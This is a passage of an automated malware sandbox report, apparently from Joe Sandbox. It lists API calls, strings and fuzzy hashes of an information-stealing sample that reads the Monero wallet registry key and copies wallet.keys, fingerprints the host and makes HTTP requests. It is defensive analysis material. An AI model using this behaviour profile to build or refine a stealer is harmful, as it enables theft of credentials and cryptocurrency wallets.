                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 004091A7
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 004091FC
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00409208
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00408FD0
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
                                                                                          • Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
                                                                                          • Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
                                                                                          • Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
                                                                                          • Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
                                                                                          • Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
                                                                                          • Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1
                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00409263
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$lstrcpy$HeapProcess$Filelstrlen$Copy$AllocAllocateCloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2344884248-0
                                                                                        • Opcode ID: 8a32bd120c3de7648835aa62839e96a1e8851a43be6b95bb348c2e23e5ccfc88
                                                                                        • Instruction ID: 01af279fe34659f2e92758b1277113fc8cf4a0ef9ee58042c38a489971cdbd96
                                                                                        • Opcode Fuzzy Hash: 8a32bd120c3de7648835aa62839e96a1e8851a43be6b95bb348c2e23e5ccfc88
                                                                                        • Instruction Fuzzy Hash: 9AD13E72910504ABCB24FBA1DD56DEE7379AF54305F14813EF502724E2EF386A09CBA9
                                                                                        APIs
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
                                                                                          • Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
                                                                                          • Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403EAC
                                                                                        • StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,00000030), ref: 00403EC7
                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040400D
                                                                                        • HttpOpenRequestA.WININET(00000000,0169A460,?,0169B128,00000000,00000000,-00400100,00000000), ref: 00404048
                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040406C
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,?,00416B92,?,004201E9,00000000,00416B92,?,00000000,00416B92,",00000000,00416B92,build_id), ref: 004042BD
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000030), ref: 004042D6
                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004042E7
                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004042FE
                                                                                        • InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 0040434A
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404355
                                                                                        • InternetCloseHandle.WININET(?), ref: 00404367
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404371
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                                                                        • String ID: "$------$build_id$hwid
                                                                                        • API String ID: 1585128682-50533134
                                                                                        • Opcode ID: d0a5a0a515663f665d08bbeb1d1109fba58a5cce67514d4fc39d3ba5028ee652
                                                                                        • Instruction ID: b133d135036fceaf129ec02b97349a15de150af5b357d63d1a2f8011ac320ed4
                                                                                        • Opcode Fuzzy Hash: d0a5a0a515663f665d08bbeb1d1109fba58a5cce67514d4fc39d3ba5028ee652
                                                                                        • Instruction Fuzzy Hash: 7DF1FE72910108AEDB15FBA1DC92EEE7378AF54704F54817EB112724D1EF386A0DCBA8
                                                                                        APIs
                                                                                        • strtok_s.MSVCRT ref: 0041202B
                                                                                        • lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,00000104), ref: 004120C1
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004120FA
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041213C
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041217E
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004121BF
                                                                                        • StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412322
                                                                                        • strtok_s.MSVCRT ref: 004123AC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$strtok_s
                                                                                        • String ID: anA$false$true
                                                                                        • API String ID: 2610293679-3558530194
                                                                                        • Opcode ID: 3386de19d766336cc89c77304d2fc18588b83f4d6ece37205452856df6fb31f9
                                                                                        • Instruction ID: 28ec9be6b1e855a5d5ad00fa29704b442616d7bac6571d6649f76a51c6d16edf
                                                                                        • Opcode Fuzzy Hash: 3386de19d766336cc89c77304d2fc18588b83f4d6ece37205452856df6fb31f9
                                                                                        • Instruction Fuzzy Hash: B1A1B7B2D00204ABDB24EBB1DC45DEE777DEF54304F00456EF51AA6142EB78A6C9CB94
                                                                                        APIs
                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 00410758
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000), ref: 00410769
                                                                                        • CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?), ref: 00410783
                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?), ref: 004107BC
                                                                                        • VariantInit.OLEAUT32(?), ref: 0041081B
                                                                                          • Part of subcall function 00410630: CoCreateInstance.OLE32(00424770,00000000,00000001,004238C4,00410847,00000000,00000000,00000030,00410847,00000030,?,00000001,?,00000030,00000000,00000000), ref: 0041066D
                                                                                          • Part of subcall function 00410630: SysAllocString.OLEAUT32(?), ref: 0041067B
                                                                                          • Part of subcall function 00410630: _wtoi64.MSVCRT ref: 004106BA
                                                                                          • Part of subcall function 00410630: SysFreeString.OLEAUT32(?), ref: 004106D9
                                                                                          • Part of subcall function 00410630: SysFreeString.OLEAUT32(00000000), ref: 004106E0
                                                                                        • FileTimeToSystemTime.KERNEL32(?,00000000,?,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 00410852
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 0041085E
                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000,?), ref: 00410865
                                                                                        • VariantClear.OLEAUT32(?), ref: 004108A9
                                                                                        • wsprintfA.USER32 ref: 00410891
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                        • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$WQL
                                                                                        • API String ID: 1611285705-271508173
                                                                                        • Opcode ID: 09b10624150b565fb9ee4139e1e133b027331012701015932dd590229877180f
                                                                                        • Instruction ID: f60bae9c613f7fa121a8b30a4fe63b67029c37922dcc64605f50a105dcd30c53
                                                                                        • Opcode Fuzzy Hash: 09b10624150b565fb9ee4139e1e133b027331012701015932dd590229877180f
                                                                                        • Instruction Fuzzy Hash: 4B515071A01228BBCB24DB95DC45EEFBBBCEF49B10F104116F515A7280D7799A41CBE4
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00401A48
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401A5E
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00401A65
                                                                                        • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00416D8D), ref: 00401A82
                                                                                        • RegQueryValueExA.ADVAPI32(00416D8D,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401A9C
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                          • Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                          • Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                        • RegCloseKey.ADVAPI32(00416D8D), ref: 00401AA6
                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00401AB4
                                                                                        • lstrlenA.KERNEL32(?), ref: 00401AC1
                                                                                        • lstrcatA.KERNEL32(?,.keys), ref: 00401ADC
                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401BC6
                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00401C32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHeaplstrcat$AllocCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlenmemset
                                                                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                        • API String ID: 709784044-218353709
                                                                                        • Opcode ID: 6c78f9737e0f4eb0430da094aef2da056fb3a29fe2d1524e8419046d69aa5cf9
                                                                                        • Instruction ID: f1d60a6bbfd1a10beadc68d07a737e3e9b1c6f7b3b4a17850d8004e5f304ac36
                                                                                        • Opcode Fuzzy Hash: 6c78f9737e0f4eb0430da094aef2da056fb3a29fe2d1524e8419046d69aa5cf9
                                                                                        • Instruction Fuzzy Hash: CF513E72910108ABDB14FBA1DD56EEE737DAF54304F50803EF506724D2EB786A08CBA9
                                                                                        APIs
                                                                                          • Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
                                                                                          • Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413B47
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413BAA
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413CF3
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00412EE0: StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,?,00413AD4), ref: 00412F20
                                                                                          • Part of subcall function 00412FA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412FFA
                                                                                          • Part of subcall function 00412FA0: lstrlenA.KERNEL32(00000000), ref: 00413011
                                                                                          • Part of subcall function 00412FA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00413039
                                                                                          • Part of subcall function 00412FA0: lstrlenA.KERNEL32(00000000), ref: 0041304E
                                                                                          • Part of subcall function 00412FA0: lstrlenA.KERNEL32(00000000), ref: 0041306B
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C90
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413DD9
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413E3C
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F22
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413F85
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041406B
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004140C8
                                                                                        • Sleep.KERNEL32(0000EA60), ref: 004140D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcpylstrlen$Sleep
                                                                                        • String ID: 9jA$9jA$ERROR
                                                                                        • API String ID: 507064821-3453893218
                                                                                        • Opcode ID: 0ea8e545eb3128f4f77ed40ce8583ede3be02ffdb08c09b4d87bab1d85280d1e
                                                                                        • Instruction ID: cf25ed66686d9262e125a475b4914be09e4212f98396e3805e3bfcd737600e71
                                                                                        • Opcode Fuzzy Hash: 0ea8e545eb3128f4f77ed40ce8583ede3be02ffdb08c09b4d87bab1d85280d1e
                                                                                        • Instruction Fuzzy Hash: B82220729102086ACB24FB72DD57ADE773C6F14348F50857EB80672496EF3C674C8A69
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • RegOpenKeyExA.KERNEL32(00000000,01696E38,00000000,00020019,00000000,004201E9), ref: 00410009
                                                                                        • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410052
                                                                                        • wsprintfA.USER32 ref: 0041007C
                                                                                        • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041009A
                                                                                        • RegQueryValueExA.KERNEL32(00000000,0169A7A0,00000000,000F003F,?,00000400), ref: 004100CA
                                                                                        • lstrlenA.KERNEL32(?), ref: 004100DF
                                                                                        • RegQueryValueExA.KERNEL32(00000000,0169A578,00000000,000F003F,?,00000400,00000000,?,?,00000000,80000002,00423408), ref: 00410156
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                                                        • String ID: - $%s\%s$?
                                                                                        • API String ID: 1989970852-3278919252
                                                                                        • Opcode ID: 8a58cbb879ff4631560fe32f29b8c87e8684d69af0c42c52604faec2b0e2a397
                                                                                        • Instruction ID: 86116914c5d038b2623fcf9dac74439a401e9ecf48d0cd90823b8e99bbc113d5
                                                                                        • Opcode Fuzzy Hash: 8a58cbb879ff4631560fe32f29b8c87e8684d69af0c42c52604faec2b0e2a397
                                                                                        • Instruction Fuzzy Hash: 47613EB2900109AFDB14EB91DC95FEFB77DEF44704F00816AF605A3590EB786A49CBA4
                                                                                        APIs
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
                                                                                          • Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
                                                                                          • Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6
                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000030), ref: 0040441C
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000030), ref: 00404423
                                                                                        • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404442
                                                                                        • StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,00000030), ref: 0040445A
                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404482
                                                                                        • HttpOpenRequestA.WININET(00000000,GET,?,0169B128,00000000,00000000,-00400100,00000000), ref: 004044BC
                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004044E0
                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004044EF
                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040450E
                                                                                        • InternetReadFile.WININET(00000000,?,00000400,00000001), ref: 00404566
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404597
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004045A4
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004045AB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                        • String ID: GET
                                                                                        • API String ID: 442264750-1805413626
                                                                                        • Opcode ID: 73b93f037f3d0394893e843639a95aae659a3d0ad89ccdea9a3f8b6d82784bb0
                                                                                        • Instruction ID: db9b65f6ff3aa58b69ab7c80ee4b507d2baca41c59675a027e4a866d6253625d
                                                                                        • Opcode Fuzzy Hash: 73b93f037f3d0394893e843639a95aae659a3d0ad89ccdea9a3f8b6d82784bb0
                                                                                        • Instruction Fuzzy Hash: FC5165B1A00219BBDB20DBA5DD45FAF77B9EB88701F005129FB05B72C1D7749E058BA4
                                                                                        APIs
                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041043C
                                                                                        • GetVolumeInformationA.KERNEL32({kA,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410475
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104BF
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004104C6
                                                                                        • wsprintfA.USER32 ref: 004104F9
                                                                                        • lstrcatA.KERNEL32(00000000,004238B4), ref: 00410508
                                                                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410515
                                                                                        • lstrlenA.KERNEL32(00000000,Unknown), ref: 0041053E
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00410568
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrlenwsprintf
                                                                                        • String ID: C$Unknown${kA${kA:\
                                                                                        • API String ID: 3099411152-4130650692
                                                                                        • Opcode ID: b74412bfd4cb5e005043bdfec85b093bd968682a5cb06f4c1c2fb100bc783f89
                                                                                        • Instruction ID: 2c5738cd0ea039ca6d181a749ddccaa7ec64b74ae76ae9b2a1b3dd877f563171
                                                                                        • Opcode Fuzzy Hash: b74412bfd4cb5e005043bdfec85b093bd968682a5cb06f4c1c2fb100bc783f89
                                                                                        • Instruction Fuzzy Hash: 38419171A00218ABDB10EBA4DC46FEE777CEF44705F144169F605B7181EBB85A44CBEA
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
                                                                                          • Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 00411400: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411439
                                                                                          • Part of subcall function 00411400: Process32First.KERNEL32(00000000,00000128), ref: 00411449
                                                                                          • Part of subcall function 00411400: Process32Next.KERNEL32(00000000,00000128), ref: 0041145B
                                                                                          • Part of subcall function 00411400: StrCmpCA.SHLWAPI(?,00423EE4), ref: 00411470
                                                                                          • Part of subcall function 00411400: FindCloseChangeNotification.KERNEL32(00000000), ref: 00411482
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,016996B0,00000000,?,004201E9,00000000,004176BE), ref: 00416A16
                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416B22
                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416B3C
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00410420: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041043C
                                                                                          • Part of subcall function 00410420: GetVolumeInformationA.KERNEL32({kA,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410475
                                                                                          • Part of subcall function 00410420: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104BF
                                                                                          • Part of subcall function 00410420: HeapAlloc.KERNEL32(00000000), ref: 004104C6
                                                                                          • Part of subcall function 00403E20: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403EAC
                                                                                          • Part of subcall function 00403E20: StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,00000030), ref: 00403EC7
                                                                                          • Part of subcall function 004123F0: StrCmpCA.SHLWAPI(00000000,block,?,00416B9A), ref: 0041240D
                                                                                          • Part of subcall function 004123F0: ExitProcess.KERNEL32 ref: 00412418
                                                                                          • Part of subcall function 0040E870: StrCmpCA.SHLWAPI(00000000,0169A1C0), ref: 0040E8C0
                                                                                          • Part of subcall function 0040E870: StrCmpCA.SHLWAPI(00000000,0169A120), ref: 0040E947
                                                                                          • Part of subcall function 00405BB0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C3C
                                                                                          • Part of subcall function 00405BB0: StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,00000030), ref: 00405C57
                                                                                          • Part of subcall function 00411F00: strtok_s.MSVCRT ref: 00411F24
                                                                                        • Sleep.KERNEL32(000003E8), ref: 00416F45
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,0169A5F0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00415D5B
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,00000000), ref: 00415D7E
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,?), ref: 00415D9A
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,?), ref: 00415DAE
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,0169ADA8), ref: 00415DC1
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,?), ref: 00415DD5
                                                                                          • Part of subcall function 00415D00: lstrcatA.KERNEL32(?,01699C48), ref: 00415DE9
                                                                                          • Part of subcall function 004045D0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00404641
                                                                                          • Part of subcall function 004045D0: StrCmpCA.SHLWAPI(?,0169A3B0,004201E9,004201E9,004201E9,004201E9), ref: 004046A6
                                                                                          • Part of subcall function 004045D0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004046CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$InternetOpenlstrcpy$lstrlen$CreateDirectoryHeapProcessProcess32$AllocChangeCloseExitFindFirstInformationNextNotificationSleepSnapshotToolhelp32VolumeWindowsstrtok_s
                                                                                        • String ID: .exe$_DEBUG.zip$arp$dabl$http://$org$zapto
                                                                                        • API String ID: 1055840830-1018522893
                                                                                        • Opcode ID: 69d9d5f4bed522298f1fff638014f460091bb7ee520ceaa31fb168f63291bf67
                                                                                        • Instruction ID: f22d2bd86038d1de50829419776aae838be0a57aa5f174395c24aa0c803a3848
                                                                                        • Opcode Fuzzy Hash: 69d9d5f4bed522298f1fff638014f460091bb7ee520ceaa31fb168f63291bf67
                                                                                        • Instruction Fuzzy Hash: 8AA24472D10114AACB24FB61DC52EEEB778AF54304F50817EE506725D2EF382B4DCAA9
                                                                                        APIs
                                                                                        • StrCmpCA.SHLWAPI(00000000,0169A1C0), ref: 0040E8C0
                                                                                        • StrCmpCA.SHLWAPI(00000000,0169A120), ref: 0040E947
                                                                                        • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040ECBD
                                                                                        • StrCmpCA.SHLWAPI(00000000,0169A1D0), ref: 0040EA4C
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                        • StrCmpCA.SHLWAPI(00000000,0169A1C0), ref: 0040EB30
                                                                                        • StrCmpCA.SHLWAPI(00000000,0169A120), ref: 0040EBB9
